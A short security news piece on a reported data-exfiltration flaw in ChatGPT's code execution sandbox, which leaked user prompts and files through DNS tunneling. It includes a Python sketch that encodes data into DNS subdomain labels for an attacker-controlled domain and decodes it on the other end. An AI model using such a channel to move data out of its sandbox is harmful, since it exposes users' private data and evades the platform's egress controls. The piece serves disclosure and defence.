A serious flaw in ChatGPT's code execution environment let attackers quietly steal user prompts, uploaded files, and other private information. The attackers exploited this gap using a technique called DNS tunneling.

In this method, sensitive data fragments are encoded and appended as subdomains of domains the attacker controls, so they leak out inside ordinary-looking DNS lookups. Because the DNS channel is two-way, attackers could also embed command fragments in the DNS responses sent back to the container. OpenAI patched the vulnerability on February 20, 2026, following Check Point Research's responsible disclosure. The incident marks a significant shift in AI security: as large language models become full code execution environments handling sensitive personal, medical, and financial data, every layer of communication must be protected, including basic infrastructure protocols like DNS.
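To make the mechanism concrete, here is a minimal sketch of how stolen data can be smuggled inside DNS queries. The domain name, function names, and Base32 encoding choice are illustrative assumptions, not details from the disclosed exploit; the essential idea is that DNS labels only permit a restricted character set and a 63-character limit per label, so exfiltrated bytes are encoded and chunked before being prepended to an attacker-controlled domain.

```python
import base64

# NOTE: "attacker.example" and these helper names are hypothetical,
# used only to illustrate the general DNS tunneling technique.

def encode_for_dns(data: bytes, domain: str = "attacker.example") -> str:
    """Pack a data fragment into the subdomain part of a DNS name."""
    # Base32 is DNS-safe: case-insensitive letters and digits only.
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    # Each DNS label is limited to 63 characters, so chunk the payload.
    labels = [b32[i:i + 63] for i in range(0, len(b32), 63)]
    # A full name must stay under ~253 characters, so real tunnels
    # split large files across many queries (not shown here).
    return ".".join(labels + [domain])

def decode_from_dns(query: str, domain: str = "attacker.example") -> bytes:
    """Recover the original bytes on the attacker's DNS server side."""
    payload = query[: -(len(domain) + 1)].replace(".", "").upper()
    payload += "=" * (-len(payload) % 8)  # restore Base32 padding
    return base64.b32decode(payload)
```

A resolver or egress filter only sees a lookup for something like `onswg4tfoq.attacker.example`, which is why this channel slips past application-level data protections unless DNS traffic itself is monitored.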

Platform providers must ensure that no infrastructure-level channel can be weaponized to bypass data protections at the application level.